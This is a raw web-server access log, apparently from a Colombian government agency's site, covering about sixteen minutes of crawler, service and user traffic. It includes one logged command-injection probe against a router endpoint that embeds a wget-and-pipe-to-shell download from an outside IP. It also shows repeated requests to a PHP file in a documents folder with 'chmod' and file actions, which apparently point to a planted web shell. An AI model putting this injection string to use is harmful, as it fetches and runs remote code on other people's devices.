69.171.249.7 - - [29/Jun/2024:15:35:33 -0500] "GET /bogota-destino-elegido-por-la-universidad-ana-g-mendez-de-puerto-rico-para-explorar-su-riqueza-natural-y-procesos-comunitarios.html HTTP/1.1" 200 1196
201.245.192.253 - - [29/Jun/2024:15:35:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:15:35:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [29/Jun/2024:15:34:40 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.11 - - [29/Jun/2024:15:36:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0883.pdf HTTP/1.1" 200 379354
216.245.221.92 - - [29/Jun/2024:15:36:49 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:15:36:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [29/Jun/2024:15:35:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60380
201.245.192.253 - - [29/Jun/2024:15:37:08 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35107
201.245.192.253 - - [29/Jun/2024:15:37:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35135
200.118.242.169 - - [29/Jun/2024:15:37:12 -0500] "GET /kwssiamovil/sm/acme/u?s=U2FsdGVkX1+OOyZ69h/qFMpZHXecB21MH4mtQZHepYi5zFBsk0f+t4E8cQbq+MmF2dqlvAOewpJcEY3BMNWziQIFw5V80bj4aeFm0/gEycJpwciW1Uhu6woUdHTuGw8TXTJAJY3la8ormxboJ65lgDn6yFpauwC2PTHMM7prHwo=&u=U2FsdGVkX183NDSMBKDM3/+akMd/YtcesKz01Pa/hBY=&y=U2FsdGVkX19xKwkhSm4FFtgp15PFXpSCyDtQ6fToJ/8epaSV/Yc1YobB3ndgIqrS HTTP/1.1" 200 60
66.249.66.12 - - [29/Jun/2024:15:37:37 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2016%20del%2022%20de%20octubre%20de%202012.pdf HTTP/1.1" 200 381186
66.249.66.13 - - [29/Jun/2024:15:37:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3333.pdf HTTP/1.1" 200 534059
201.245.192.253 - - [29/Jun/2024:15:37:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:15:37:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
185.191.127.212 - - [29/Jun/2024:15:38:06 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F93.123.72.16%2Ft+-O-+|+sh%60) HTTP/1.1" 404 1018
216.244.66.195 - - [29/Jun/2024:15:38:08 -0500] "GET /robots.txt HTTP/1.1" 404 1018
47.128.58.38 - - [29/Jun/2024:15:38:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=1596.zip HTTP/1.1" 200 2741
47.128.33.220 - - [29/Jun/2024:15:38:25 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=3504.pdf HTTP/1.1" 200 2716
201.245.192.253 - - [29/Jun/2024:15:38:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
47.128.60.198 - - [29/Jun/2024:15:38:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=3353.pdf HTTP/1.1" 200 2716
66.249.66.13 - - [29/Jun/2024:15:38:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2344.pdf HTTP/1.1" 200 421564
47.128.22.109 - - [29/Jun/2024:15:38:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=7333.pdf HTTP/1.1" 200 2739
201.245.192.253 - - [29/Jun/2024:15:38:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.127.34 - - [29/Jun/2024:15:39:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=01713.pdf HTTP/1.1" 200 2742
47.128.54.185 - - [29/Jun/2024:15:39:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&c=1&f=1964.pdf HTTP/1.1" 200 2740
201.245.192.253 - - [29/Jun/2024:15:39:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35437
172.22.2.4 - - [29/Jun/2024:15:37:42 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61913
51.222.44.176 - - [29/Jun/2024:15:39:27 -0500] "GET /?doors-test-article HTTP/1.1" 200 319
51.222.44.176 - - [29/Jun/2024:15:39:28 -0500] "GET /doors-test-article HTTP/1.1" 404 1032
51.222.44.176 - - [29/Jun/2024:15:39:28 -0500] "GET /doors-test-article/ HTTP/1.1" 404 1032
47.128.53.249 - - [29/Jun/2024:15:39:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&c=1&f=2894.pdf HTTP/1.1" 200 2740
66.249.66.13 - - [29/Jun/2024:15:39:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1313.pdf HTTP/1.1" 200 442929
47.128.113.242 - - [29/Jun/2024:15:39:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=00198.pdf HTTP/1.1" 200 2742
47.128.48.106 - - [29/Jun/2024:15:39:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=3698.pdf HTTP/1.1" 200 2740
201.245.192.253 - - [29/Jun/2024:15:39:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [29/Jun/2024:15:39:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:15:39:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35135
66.249.66.11 - - [29/Jun/2024:15:40:10 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/0258.pdf HTTP/1.1" 200 292609
47.128.57.121 - - [29/Jun/2024:15:40:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&c=1&f=3437.pdf HTTP/1.1" 200 2740
47.128.57.121 - - [29/Jun/2024:15:40:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&c=1&f=3437.pdf HTTP/1.1" 200 2740
66.249.66.12 - - [29/Jun/2024:15:40:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1607.pdf HTTP/1.1" 200 386856
201.245.192.253 - - [29/Jun/2024:15:40:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.74.69 - - [29/Jun/2024:15:41:28 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [29/Jun/2024:15:41:36 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
66.249.66.12 - - [29/Jun/2024:15:41:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2772.pdf HTTP/1.1" 200 423044
66.249.66.13 - - [29/Jun/2024:15:41:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0935.pdf HTTP/1.1" 200 70010
216.245.221.92 - - [29/Jun/2024:15:41:49 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:15:41:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [29/Jun/2024:15:41:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
207.46.13.126 - - [29/Jun/2024:15:42:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/4303.pdf HTTP/1.1" 200 410813
172.22.2.4 - - [29/Jun/2024:15:40:30 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.11 - - [29/Jun/2024:15:42:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3143.pdf HTTP/1.1" 200 381434
66.249.66.12 - - [29/Jun/2024:15:42:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0868.pdf HTTP/1.1" 200 1950750
66.249.66.13 - - [29/Jun/2024:15:42:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4057.pdf HTTP/1.1" 200 371678
201.245.192.253 - - [29/Jun/2024:15:42:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [29/Jun/2024:15:41:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60380
40.77.167.26 - - [29/Jun/2024:15:43:13 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2024%2F HTTP/1.1" 200 28538
3.145.97.68 - - [29/Jun/2024:15:43:16 -0500] "GET /robots.txt HTTP/1.1" 404 1018
3.145.97.68 - - [29/Jun/2024:15:43:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=sort_asc HTTP/1.1" 200 85
40.77.167.26 - - [29/Jun/2024:15:43:23 -0500] "GET /BLA/resoluciones/dlf/styles.css HTTP/1.1" 200 3049
66.249.74.68 - - [29/Jun/2024:15:43:28 -0500] "GET /js/url.js HTTP/1.1" 404 1198
201.245.192.253 - - [29/Jun/2024:15:43:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.12 - - [29/Jun/2024:15:43:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2351.pdf HTTP/1.1" 200 408607
201.245.192.253 - - [29/Jun/2024:15:43:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:15:43:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [29/Jun/2024:15:44:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/0442.pdf HTTP/1.1" 200 247438
66.249.66.11 - - [29/Jun/2024:15:44:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/2474.pdf HTTP/1.1" 200 559201
66.249.66.12 - - [29/Jun/2024:15:44:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/2043.pdf HTTP/1.1" 200 335675
66.249.66.12 - - [29/Jun/2024:15:44:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202024/00012.pdf HTTP/1.1" 200 514786
66.249.66.11 - - [29/Jun/2024:15:44:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/1928.pdf HTTP/1.1" 200 403789
66.249.66.11 - - [29/Jun/2024:15:44:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/2382.pdf HTTP/1.1" 200 308032
66.249.66.13 - - [29/Jun/2024:15:44:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/1758.pdf HTTP/1.1" 200 287414
66.249.66.11 - - [29/Jun/2024:15:44:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/2121.pdf HTTP/1.1" 200 288535
66.249.66.12 - - [29/Jun/2024:15:44:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/1874.pdf HTTP/1.1" 200 284358
66.249.66.11 - - [29/Jun/2024:15:44:45 -0500] "GET /Publicaciones/2024EE129666.pdf HTTP/1.1" 200 241823
66.249.66.12 - - [29/Jun/2024:15:44:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202024/00570.pdf HTTP/1.1" 200 7806006
66.249.66.12 - - [29/Jun/2024:15:44:48 -0500] "GET /BLA/resoluciones/AUTOS%202023/2444.pdf HTTP/1.1" 200 329257
66.249.66.11 - - [29/Jun/2024:15:44:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/0932.pdf HTTP/1.1" 200 6346191
66.249.66.14 - - [29/Jun/2024:15:44:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/3800.pdf HTTP/1.1" 200 273500
66.249.66.13 - - [29/Jun/2024:15:44:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/2002.pdf HTTP/1.1" 200 259114
66.249.66.14 - - [29/Jun/2024:15:44:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/0974.pdf HTTP/1.1" 200 342294
66.249.66.11 - - [29/Jun/2024:15:44:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/0562.pdf HTTP/1.1" 200 280543
66.249.66.11 - - [29/Jun/2024:15:44:52 -0500] "GET /BLA/resoluciones/AUTOS%202023/09293.pdf HTTP/1.1" 200 450139
66.249.66.14 - - [29/Jun/2024:15:44:52 -0500] "GET /BLA/resoluciones/AUTOS%202023/11210.pdf HTTP/1.1" 200 1638272
66.249.66.14 - - [29/Jun/2024:15:44:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/0651.pdf HTTP/1.1" 200 263275
66.249.66.15 - - [29/Jun/2024:15:44:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202024/00750.pdf HTTP/1.1" 200 5648369
66.249.66.21 - - [29/Jun/2024:15:44:55 -0500] "GET /Publicaciones/2024EE133253.pdf HTTP/1.1" 200 241837
66.249.66.11 - - [29/Jun/2024:15:44:56 -0500] "GET /BLA/resoluciones/AUTOS%202023/08743.pdf HTTP/1.1" 200 2083097
66.249.66.21 - - [29/Jun/2024:15:44:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/2549.pdf HTTP/1.1" 200 323970
201.245.192.253 - - [29/Jun/2024:15:44:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.17 - - [29/Jun/2024:15:44:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/1614.pdf HTTP/1.1" 200 8938388
66.249.66.1 - - [29/Jun/2024:15:45:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/1449.pdf HTTP/1.1" 200 458919
66.249.66.11 - - [29/Jun/2024:15:45:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/1382.pdf HTTP/1.1" 200 3999279
66.249.66.16 - - [29/Jun/2024:15:45:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/2372.pdf HTTP/1.1" 200 469736
66.249.66.12 - - [29/Jun/2024:15:45:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/2182.pdf HTTP/1.1" 200 317344
66.249.66.16 - - [29/Jun/2024:15:45:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%201051-1100/00001064.tif HTTP/1.1" 200 53534
201.245.192.253 - - [29/Jun/2024:15:45:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [29/Jun/2024:15:45:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [29/Jun/2024:15:46:49 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:15:46:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [29/Jun/2024:15:47:49 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202023/1156.pdf HTTP/1.1" 304 -
66.249.66.12 - - [29/Jun/2024:15:47:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2528.pdf HTTP/1.1" 200 364314
201.245.192.253 - - [29/Jun/2024:15:47:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [29/Jun/2024:15:47:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
207.46.13.7 - - [29/Jun/2024:15:47:59 -0500] "GET /BLA/resoluciones/AUTOS%202023/3183.pdf HTTP/1.1" 304 -
172.22.2.4 - - [29/Jun/2024:15:46:20 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:15:48:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [29/Jun/2024:15:47:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60380
66.249.66.11 - - [29/Jun/2024:15:48:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4661.pdf HTTP/1.1" 200 452323
201.245.192.253 - - [29/Jun/2024:15:48:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.55.97 - - [29/Jun/2024:15:49:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=03423.pdf HTTP/1.1" 200 2741
47.128.22.201 - - [29/Jun/2024:15:49:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=secretaria-de-ambiente-y-bomberos-recuperan-boa-que-estaba-en-una-silla-de-carro-para-bebe.html HTTP/1.1" 200 2716
66.249.66.12 - - [29/Jun/2024:15:49:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2621.pdf HTTP/1.1" 200 368308
66.249.66.13 - - [29/Jun/2024:15:49:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2097.pdf HTTP/1.1" 200 380538
201.245.192.253 - - [29/Jun/2024:15:49:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [29/Jun/2024:15:49:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
186.154.37.112 - - [29/Jun/2024:15:50:30 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
186.154.37.112 - - [29/Jun/2024:15:50:31 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.154.37.112 - - [29/Jun/2024:15:50:31 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12419
186.154.37.112 - - [29/Jun/2024:15:50:31 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.154.37.112 - - [29/Jun/2024:15:50:31 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.37.112 - - [29/Jun/2024:15:50:31 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.37.112 - - [29/Jun/2024:15:50:31 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.37.112 - - [29/Jun/2024:15:50:31 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.37.112 - - [29/Jun/2024:15:50:31 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.37.112 - - [29/Jun/2024:15:50:31 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.37.112 - - [29/Jun/2024:15:50:31 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.154.37.112 - - [29/Jun/2024:15:50:36 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 2227
186.154.37.112 - - [29/Jun/2024:15:50:36 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.37.112 - - [29/Jun/2024:15:50:36 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16376
186.154.37.112 - - [29/Jun/2024:15:50:37 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.154.37.112 - - [29/Jun/2024:15:50:37 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.37.112 - - [29/Jun/2024:15:50:37 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.37.112 - - [29/Jun/2024:15:50:37 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.37.112 - - [29/Jun/2024:15:50:37 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.37.112 - - [29/Jun/2024:15:50:37 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.37.112 - - [29/Jun/2024:15:50:37 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.37.112 - - [29/Jun/2024:15:50:37 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
186.154.37.112 - - [29/Jun/2024:15:50:38 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.154.37.112 - - [29/Jun/2024:15:50:38 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 2658
186.154.37.112 - - [29/Jun/2024:15:50:39 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 63879
186.154.37.112 - - [29/Jun/2024:15:50:40 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.154.37.112 - - [29/Jun/2024:15:50:40 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.37.112 - - [29/Jun/2024:15:50:40 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.37.112 - - [29/Jun/2024:15:50:40 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.37.112 - - [29/Jun/2024:15:50:40 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.37.112 - - [29/Jun/2024:15:50:40 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.37.112 - - [29/Jun/2024:15:50:41 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.37.112 - - [29/Jun/2024:15:50:41 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1564
66.249.66.12 - - [29/Jun/2024:15:50:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20601-650/00000607.tif HTTP/1.1" 200 39918
66.249.66.11 - - [29/Jun/2024:15:50:44 -0500] "GET /BLA/resoluciones/AUTOS%202011/0121.pdf HTTP/1.1" 200 188535
186.154.37.112 - - [29/Jun/2024:15:50:48 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 2843
186.154.37.112 - - [29/Jun/2024:15:50:51 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 2836
186.154.37.112 - - [29/Jun/2024:15:50:53 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 35446
186.154.37.112 - - [29/Jun/2024:15:50:53 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.154.37.112 - - [29/Jun/2024:15:50:53 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.37.112 - - [29/Jun/2024:15:50:53 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.37.112 - - [29/Jun/2024:15:50:53 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.37.112 - - [29/Jun/2024:15:50:53 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.37.112 - - [29/Jun/2024:15:50:53 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.37.112 - - [29/Jun/2024:15:50:53 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.37.112 - - [29/Jun/2024:15:50:53 -0500] "POST /sipse/faces/presentacion/contratacion/contrato/listarContrato.xhtml HTTP/1.1" 200 28858
66.249.66.12 - - [29/Jun/2024:15:50:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/5529.pdf HTTP/1.1" 200 2529495
201.245.192.253 - - [29/Jun/2024:15:50:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
186.154.37.112 - - [29/Jun/2024:15:50:58 -0500] "POST /sipse/faces/presentacion/contratacion/contrato/listarContrato.xhtml HTTP/1.1" 200 10904
172.22.2.4 - - [29/Jun/2024:15:51:06 -0500] "GET /BLA/boletinlegal/Circulares/2023/CIRCULAR%20No.%2000003%20DEL%2021%20DE%20FEBRERO%20DEL%202023.pdf HTTP/1.1" 304 -
172.22.2.4 - - [29/Jun/2024:15:51:08 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/G__Jurisp.%20Junio%202014_Sent%20Tutela%20Drumond.docx HTTP/1.1" 304 -
66.249.66.13 - - [29/Jun/2024:15:51:16 -0500] "GET /BLA/resoluciones/Autos%202008/0388.pdf HTTP/1.1" 200 244947
186.154.37.112 - - [29/Jun/2024:15:51:31 -0500] "POST /sipse/faces/presentacion/contratacion/contrato/listarContrato.xhtml HTTP/1.1" 200 7866
186.154.37.112 - - [29/Jun/2024:15:51:37 -0500] "POST /sipse/faces/presentacion/contratacion/contrato/listarContrato.xhtml HTTP/1.1" 200 7866
186.154.37.112 - - [29/Jun/2024:15:51:39 -0500] "POST /sipse/faces/presentacion/contratacion/contrato/listarContrato.xhtml HTTP/1.1" 200 7866
186.154.37.112 - - [29/Jun/2024:15:51:40 -0500] "POST /sipse/faces/presentacion/contratacion/contrato/listarContrato.xhtml HTTP/1.1" 200 7866
186.154.37.112 - - [29/Jun/2024:15:51:43 -0500] "POST /sipse/faces/presentacion/contratacion/contrato/listarContrato.xhtml HTTP/1.1" 200 7866
186.154.37.112 - - [29/Jun/2024:15:51:44 -0500] "POST /sipse/faces/presentacion/contratacion/contrato/listarContrato.xhtml HTTP/1.1" 200 7866
186.154.37.112 - - [29/Jun/2024:15:51:44 -0500] "POST /sipse/faces/presentacion/contratacion/contrato/listarContrato.xhtml HTTP/1.1" 200 7866
186.154.37.112 - - [29/Jun/2024:15:51:48 -0500] "POST /sipse/faces/presentacion/contratacion/contrato/listarContrato.xhtml HTTP/1.1" 200 7866
216.245.221.92 - - [29/Jun/2024:15:51:49 -0500] "HEAD / HTTP/1.1" 200 -
186.154.37.112 - - [29/Jun/2024:15:51:51 -0500] "POST /sipse/faces/presentacion/contratacion/contrato/listarContrato.xhtml HTTP/1.1" 200 7866
66.249.66.11 - - [29/Jun/2024:15:51:54 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2260.pdf HTTP/1.1" 200 401571
66.249.66.12 - - [29/Jun/2024:15:51:54 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1888.pdf HTTP/1.1" 200 779518
186.154.37.112 - - [29/Jun/2024:15:51:54 -0500] "POST /sipse/faces/presentacion/contratacion/contrato/listarContrato.xhtml HTTP/1.1" 200 69438
201.245.192.253 - - [29/Jun/2024:15:51:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
